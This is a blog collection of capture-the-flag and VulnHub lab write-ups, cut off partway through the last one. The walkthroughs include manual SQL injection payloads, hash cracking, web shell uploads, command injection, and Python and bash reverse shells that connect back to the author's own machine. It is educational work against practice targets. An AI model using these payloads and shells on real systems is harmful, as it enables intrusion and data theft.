[CTF] VoidSec CTF

I’m sorry for the big delay but I was full of exams in this period and I didn’t have time to write post in my blog. Today I want to show you the writeup of an awesome CTF: http://ctf.voidsec.com.

Information Gathering

First of all I launched a scan with nmap:

nmap ctf.voidsec.com -sS -p 1-65535

After some time (a lot of time) I found the open ports:

PORT      STATE    SERVICE 
22/tcp    open     ssh 
54/tcp    filtered xns-ch 
111/tcp   open     rpcbind 
8332/tcp  filtered unknown 
8333/tcp  filtered bitcoin 
9332/tcp  filtered unknown 
9333/tcp  filtered litecoin 
9987/tcp  filtered dsm-scm-target 
51065/tcp open     unknown 
62222/tcp open     unknown 
65324/tcp open     unknown

I tried to browse to http://ctf.voidsec.com:65324 and I realized that I found the http port. I clicked on the big START button wich showed me a popup which said:

Back in my days I used to start with a bit of healthy Information Gathering

Ok, let’s do this information gathering.
First of all I bruteforced directories and files with directory-list-2.3-medium.txt dirbuster wordlist and I found /backup-recovery folder. Directory listing was active and I downloaded the only file which was inside it (userlist.bak). Also I found the /include folder and bruteforcing files I found config.php.bak which contained an hash salt: 3f42

At the end I took a look into robots.txt and I found the admin login portal directory: /eLprZw6c. When I tried to access it I got an error 403:

Error 403 - Forbidden

This interface is only accessible from: 144.11.32.239

Your IP Address: 79.30.175.53

To bypass this I changed the admin_ip cookie value to 144.11.32.239.

Bruteforcing is your friend

I moved to registration page (http://ctf.voidsec.com:65324/register.php) and I noticed that I could choose an username and the page noticed me if the username was already taken or not. So I intercepted the request (it was an AJAX one) with Burpsuite and I bruteforced the usernames with the .bak file previously downloaded. At the end I found only one username: sukumar. Then I bruteforced the password with Burpsuite from the login form and I found trustno1.

Cookie Injection

Now that I am logged in as sukumar I explored the page, there was a dashboard with a disabled comments section, I tried to enable it but it was not the right path. Then I found a new cookie, secure_club:

c3VrdW1hcjpOeklnTmpVZ05tUWdOalVnTm1RZ05qSWdOalVnTnpJZ05XWWdObVFnTmpVPTowOjE0ODY4OTkwNTE%3D

I decoded it from URL and then from base64 and I found this:

sukumar:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Then I tested if the cookie was vulnerable to SQL Injection:

sukumar' OR 1=1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I re-encoded it and I refreshed the page. Now the username sukumar, which was on the top-left menu, was replaced by Without pain so I can exploit the SQLi. First of all I found the number of columns:

sukumar' GROUP BY 1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 2#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 3#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 4#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 6#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Until GROUP BY 5 the page was rendered correctly but when I tried with 6 columns the username and email were blank, so I supposed that the query return only 5 columns. Now I found the vulnerable columns:

s' UNION ALL SELECT 1,2,3,4,5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

On the page number 2 and 5 were displayed so I can use these two columns to dump the database:

s' UNION ALL SELECT 1,database(),3,4,user()#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I got this:

ctf
ctf_user@localhost

Now I found table names:

s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

So, the tables are:

comments
users
usersonline

The table users was the one which interested me, so I discovered the column names:

s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 3,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 4,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

The columns of table users are:

id
username
type
password
mail

Now dump the admin email:

s' UNION ALL SELECT 1,CONCAT(username, '~', password, '~', mail),3,4,5 FROM users LIMIT 9,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

This is the output:

tyler~b9e45646f4d582b700c59c0211eedc6c~tylerdurden@mayhem.com

Ok, now I need to crack the hash. With hash-identifier I found that it could be MD5($salt.$pass), so I created a file with the hash and the salt:

b9e45646f4d582b700c59c0211eedc6c:3f42

Also, clicking on “Forgot your password?” on admin portal login I found the password rules:

Remember, your new password must:

- start with _
- use only this charset [a-z][A-Z][0-9]
- be max 8 char length

So i performed a mask attack with hashcat:

optirun hashcat -a 3 -m 20 -1 _ -2 ?l?u?d ?1?2?2?2?2?2?2?2 hash.txt

After some minutes I found the password: _Kr4K3n0.

Give me a reverse shell!

Now that I am logged in with the admin credentials I found an upload form on the settings menu on the top-right of the dashboard. It accepts only .xml files but I tried to upload a PHP shell:

POST /eLprZw6c/upload.php HTTP/1.1
Host: ctf.voidsec.com:65324
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ctf.voidsec.com:65324/eLprZw6c/settings.php
Cookie: __cfduid=df50c6365654161b804e8cbafbfbd1ccc1486652943; __utma=225611421.1379856735.1486652948.1486652948.1486850440.2; __utmz=225611421.1486652948.1.1.utmcsr=ctf.voidsec.com:65324|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; secure_club=cycgVU5JT04gQUxMIFNFTEVDVCAxLENPTkNBVCh1c2VybmFtZSwgJ34nLCBwYXNzd29yZCwgJ34nLCBtYWlsKSwzLDQsNSBGUk9NIHVzZXJzIExJTUlUIDksMSM6TnpJZ05qVWdObVFnTmpVZ05tUWdOaklnTmpVZ056SWdOV1lnTm1RZ05qVT06MDoxNDg2ODk5MDUx; admin_ip=144.11.32.239; PHPSESSID=tqo38cmsghq0q2msd1to1sp115
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------178431310316686449931498616622
Content-Length: 250

-----------------------------178431310316686449931498616622
Content-Disposition: form-data; name="file"; filename="shell.php;.xml"
Content-Type: text/xml



-----------------------------178431310316686449931498616622--

After upload the “XML” was processed and I got the reverse shell on my box! Then I browsed to /zCTF-END-HERE and I red END.txt file.
CTF completed!

Advertisements
[CTF] VoidSec CTF

[HACKME] BeachResort

Another CTF by decoder-ap. To complete the CTF I need to answer to these questions:
1) What is the CMS administrator’s username?
2) What is the db name?
3) List the table names.
4) List all the files stored in the root directory of superCMS admin site.
5) What is the license key?
6) List the contents of a very super secret file.

ANALYZING THE TARGET

When I opened my sandbox I saw a static HTML website of the BeachResort. It was made with SuperCMS (it is a fictitious name) which is in beta version so it can be vulnerable to something. Looking at the SuperCMS banner URL at the bottom of the page I discovered an hidden folder: cmsadm but browsing into it I got error 403. So there is not an index page into the admin panel and I need to guess it.

EXPLOITATION

After some reasearch I discovered the login panel: cmsadm/login.php. There was a login form with an username and a password. I tested it to an SQL Injection with SQL Map and it is exploitable but I will perform it manually. First of all I tried to append an apix to the username parameter but nothing happened, then I tried an UNION based SQLi:

user' UNION ALL SELECT 1-- -

And it worked! Notice that I have only one column where to inject the code. Then I found the database name:

user' UNION ALL SELECT database()-- -

This is the output:

supercms 

Now I discovered the tables names:

user' UNION ALL SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- -

I increased LIMIT from 0 to 2 by 1 and I retrieved the only three tables of database supercms:

groups
license
operators

Then I retrieved columns names of operators table:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 1,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 2,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 3,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 4,1-- -

And I got:

id
username
password
firstname
lastname

Now I dumped data from operators table:

user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 0, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 1, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 2, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 3, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 4, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 5, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 6, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 7, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 8, 1-- -

This is the output:

andrew 5f4dcc3b5aa765d61d8327deb882cf99
beatrice 5f4dcc3b5aa765d61d8327deb882cf99
arnold 5f4dcc3b5aa765d61d8327deb882cf99
barbara 5f4dcc3b5aa765d61d8327deb882cf99
eva 5f4dcc3b5aa765d61d8327deb882cf99
test1 5f4dcc3b5aa765d61d8327deb882cf99
test2 5f4dcc3b5aa765d61d8327deb882cf99
test3 5f4dcc3b5aa765d61d8327deb882cf99
cmsadmin 2bfea2ff114ccd30d95e176a1d25346a

Now I retrieved the license key:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 1,1-- -

The output:

id
license_key

Then:

user' UNION ALL SELECT license_key FROM license LIMIT 0, 1-- -

And I got the license key. Then I logged in as cmsadmin:

cmsadmin'-- -

Now I clicked on “Upload Image File” link, I setup Burpsuite as proxy and I uploaded a .gif file, I edited the content of the fake image:

GIF89a

Then I edited the extension to .gif.php and I forwarded the request. Now I uploaded it succesfully and I browsed to /images/shell.gif.php. Now I can execute arbitrary PHP code. First of all I listed the content of cmsadm folder:

/images/shell.gif.php?cmd=print_r(scandir('../cmsadm'));

And I got this:

add_page.php
css
images
include
js
login.php
menu.php
scripts
secret.noop
update_page.php
upload.php

Then I red the secret file:

/images/shell.gif.php?cmd=echo readfile('../cmsadm/secret.noop');

CTF completed!

[HACKME] BeachResort

[HACKME] Hack_My_Microblog

I start the Hack.me series today with a challenge made by a friend (decoder-ap): https://hack.me/102464/hack-my-microblog12.html. The objective is to find a secret key hidden into the website.

ANALYZING THE TARGET

When I started the sandbox I had a submit form with two input field, the first one is my nickname the second one allowed me to insert some random text. I tried to see if it was vulnerable to SQLi appending an apix into the first field but I got a redirect on the same page. But when I tried to do the same with the second field I got:

Ops..r u trying to hack me? hope this helps =>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 2

Cool! Let’s exploit this SQLi.

EXPLOITATION

I assumed that the SQL query was an INSERT and after some reasearch I found an interesting PDF of Exploit-DB. I used Updatexml() function to exploit the SQLi. First of all I found the MySQL version:

' or updatexml(1, concat(0x7e, (version())), 0) or '

And I got:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~5.1.65-community-log'

So the MySQL version is 5.1.65. Now I checked the tables:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)), 0) or '

This was the output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~comments_text'

The first table that I found is comments_text. I used the LIMIT function so I increased the value to check if there are more then this one:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)), 0) or '

The output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secret'

Bingo! Now I retrieved the columns names:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 0,1)), 0) or '

I got the first field:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~userid'

Now increase the LIMIT value:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 1,1)), 0) or '

I got the second value:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secretkey'

Now I just extracted data:

' or updatexml(0, concat(0x7e, (SELECT concat_ws(':', userid, secretkey) FROM secret LIMIT 0,1)), 0) or '

And I got the key!

[HACKME] Hack_My_Microblog

[VULNHUB] Wallaby’s: Nightmare (1.0.2)

This VM is really awesome, especially the privilege escalation part! Let’s hack it!

RCE IS YOUR FRIEND

First of all I discovered the open ports of the VM:

nmap 192.168.1.11 -p 1-65535

And I got this:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 18:59 CET
Nmap scan report for 192.168.1.11
Host is up (0.0081s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
6667/tcp filtered irc

Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds

I browsed to http://192.168.1.11 and I found a submit form which said:

Enter a username to get started with this CTF! 

Cool, I typed ReverseBrain and I pressed the submit button. I got a redirect to a page which suggested me some tips, at the end of the page there were a link to start the VM. I pressed on Start the CTF! and I got redirect to http://192.168.1.11/?page=home. The first thing that I tried was a LFI on page parameter: http://192.168.1.11/?page=../../../../../../etc/passwd and I got:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
walfin:x:1000:1000:walfin,,,:/home/walfin:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
steven?:x:1001:1001::/home/steven?:/bin/bash
ircd:x:1003:1003:,,,:/home/ircd:/bin/bash

Seems that the LFI worked! Looking into the source code of the page I noticed an HTML comment:

This is what we call 'dis-information' in the cyber security world!  Are you learning anything new here ReverseBrain

Grrrr, it was an honeypot… Let’s see if we got /etc/passwd with http://192.168.1.11/?page=../../../../../../etc/shadow but I got this:

That's some fishy stuff you're trying there ReverseBrain buddy. You must think Wallaby codes like a monkey! I better get to securing this SQLi though...

(Wallaby caught you trying an LFI, you gotta be sneakier! Difficulty level has increased.)

Now I tried to navigate around the website but seems the port 80 was close. So I retried an nmap scan:

nmap 192.168.1.11 -p 1-65535

And I discovered that the web server switched to another port:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 19:10 CET
Nmap scan report for 192.168.1.11
Host is up (0.0082s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
6667/tcp  filtered irc
60080/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds

So I browsed to http://192.168.1.11:60080/ and on the new web page there was an image and a phrase which said:

HOLY MOLY, this guy ReverseBrain wants me...Glad I moved to a different port so I could work more securely!!!

Eheheheh, now I tried to bruteforce the pages. I browsed to http://192.168.1.11:60080/?page=test and I got an error:

Dude, ReverseBrain what are you trying over here?!

Now I reloaded the page intercepting the GET request with BurpSuite, I sent it to Intruder with the following payload:

GET /?page=§test§ HTTP/1.1
Host: 192.168.1.11:60080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

I used raft-small-directories-lowercase.txt as wordlist and I found index, home, mailer and blacklist. I browsed to http://192.168.1.11:60080/?page=mailer and there was only a Coming soon guys! blue header. Into the source code I found a comment which said:

/?page=mailer&mail=mail wallaby "message goes here"

So I tried to verify if the mail parameter was affected by RCE vulnerability. So I tried http://192.168.1.11:60080/?page=mailer&mail=id and I got:

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Cool! Now I can get a reverse shell. First of all I started listen locally:

nc -lvp 1234

Then I typed:

http://192.168.1.11:60080/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I have a reverse shell and I got a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I need to escalate privileges.

TAKE CARE ABOUT THE IRC BOTS!

First of all I tried:

sudo -l

This is the output:

Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables

So I can modify the iptables as root. I took a look on the processes too:

waldo      727  0.0  0.5  29416  2924 ?        Ss   09:55   0:00 tmux new-session -d -s irssi
waldo      729  0.0  0.1   4508   700 pts/0    Ss   09:55   0:00 -sh
waldo      749  0.0  1.7 115744  8520 pts/0    Sl+  09:55   0:00 irssi
wallaby    977  0.0  4.9 516868 24964 ?        Sl   09:55   0:00 /usr/bin/python3 /usr/bin/sopel -d --quiet

Seems that waldo is connected to the IRC server which is not accessible from the external network and seems to be an IRC bot too made with Sopel and started from wallaby. First of all check the iptables:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     tcp  --  127.0.0.1            0.0.0.0/0            tcp dpt:6667
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:6667

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination 

As I suspected the iptables DROP the request to IRC port 6667 if they come from 0.0.0.0 but not from localhost. Remove this chain and add a new one:

sudo iptables -D INPUT -p tcp -m tcp --dport 6667 -j DROP
sudo iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6667 -j ACCEPT

Now I can connect to IRC server from HexChat which is already installed into my Kali box. I added a new server called CTF with the following IP/Port: 192.168.1.11/6667. I found the only available channel which was #wallabyschat (from irssi inside the exploited VM). So I joined it:

/join #wallabyschat

There were 3 users: me, waldo (who was the channel operator) and wallabysbot. The bot is made with Sopel which accepts lot of command included .run. I typed it and I got a response from the bot:

Hold on, you aren't Waldo?

I analyzed the command browsing to /home/wallaby/.sopel/modules and I found run.py:

import sopel.module, subprocess, os
from sopel.module import example

@sopel.module.commands('run')
@example('.run ls')
def run(bot, trigger):
     if trigger.owner:
          os.system('%s' % trigger.group(2))
          runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate()[0]
          runas = str(runas1)
          bot.say(' '.join(runas.split('\\n')))
     else:
          bot.say('Hold on, you aren\'t Waldo?')

Nice! There is a RCE vulnerability but I need to be logged as waldo first. So I edited the iptables:

sudo iptables -D INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
sudo iptables -A OUTPUT -o enp0s17 -s 127.0.0.1 -p tcp --dport 6667 -m owner --uid-owner waldo -j DROP

After some minutes waldo got a timeout error. After that I changed my nick:

/nick waldo

Now I exploited the RCE vulnerability:

.run id

It worked! I started listen locally:

nc -lvp 1235

Then I sent to the bot this string.

.run python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.14",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I have another reverse shell as wallaby, I got a TTY and I typed:

sudo -l

This is the output:

Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

I can run all commands with sudo. So I typed:

export TERM=xterm
sudo vi

Then I pressed ESC to enter into command mode, then I pressed ENTER. Now I started listen locally:

nc -lvp 1236

Now from vi I typed:

:!bash -i >& /dev/tcp/192.168.1.14/1236 0>&1

Now I got a shell as root. Browsing into /root I found flag.txt:

###CONGRATULATIONS###

You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!

This was my first vulnerable machine/CTF ever!  I hope you guys enjoyed playing it as much as I enjoyed making it!

Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.

Thanks guys!
-Waldo
[VULNHUB] Wallaby’s: Nightmare (1.0.2)

[VULNHUB] 64Base: 1.0.1

An unexpected Star Wars (I really love it) based VM from VulnHub. It is beautiful and I got a troll too! Let’s see what I’ve done.

FLAG 1

First of all I scanned the open ports:

nmap 192.168.1.16 -p 1-65535 -sV

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-20 18:43 CET
Nmap scan report for 192.168.1.16
Host is up (0.0092s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE    VERSION
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
4899/tcp  open  tcpwrapped
62964/tcp open  ssh        OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds

Then I scanned the port 80 with nikto:

nikto -h 192.168.1.16

I truncated the output because the robots.txt file was full of entries:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.16
+ Target Hostname:    192.168.1.16
+ Target Port:        80
+ Start Time:         2016-12-20 18:44:08 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/c3P08P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/C3p0/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/A280/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/above/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/AC1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/across/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/activation/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Adjustments/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/after/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/against/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ago/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Pack/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Parking/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
...
+ Entry '/Y888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y8b/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Yard/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Zero/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ZZ/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 429 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
+ 8115 requests: 0 error(s) and 434 item(s) reported on remote host
+ End Time:           2016-12-20 18:44:21 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The only interesting directory seems to be /admin but it required a basic HTTP authentication and I don’t have any username or password. So I analyzed the source code of the index and I discovered this:

5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a

Seems to be an hex encoded string, so I decoded it:

echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-" | xxd -p -r

This is the decoded string:

ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==

This is a base64 encoding:

echo "ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==" | base64 -d

I got the first flag and decoding the base64 content I got:

64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

Cool! Now I have an username and a password.

FLAG 2

I tried the credentials on /admin without success. I spent many hours to find the right way and at the end, reading the post into the blog, I found this:

Only respond if you are a real Imperial-Class BountyHunter

The string Imperial-Class was already familiar, in fact it was inot the robots.txt file but the letter C was lowercase (maybe a typo). So I browsed to http://192.168.1.16/Imperial-Class and I used the found credentials into the basic HTTP authentication. I got an error on the index page:

[☠] ERROR: incorrect path!.... TO THE DARK SIDE!

I looked into the source code and I found this:

don't forget the BountyHunter login

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter and a login for appeared. I used the same credentials of the previous authentication but nothing changed. I looked into the source code of the page and I found three strings:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756
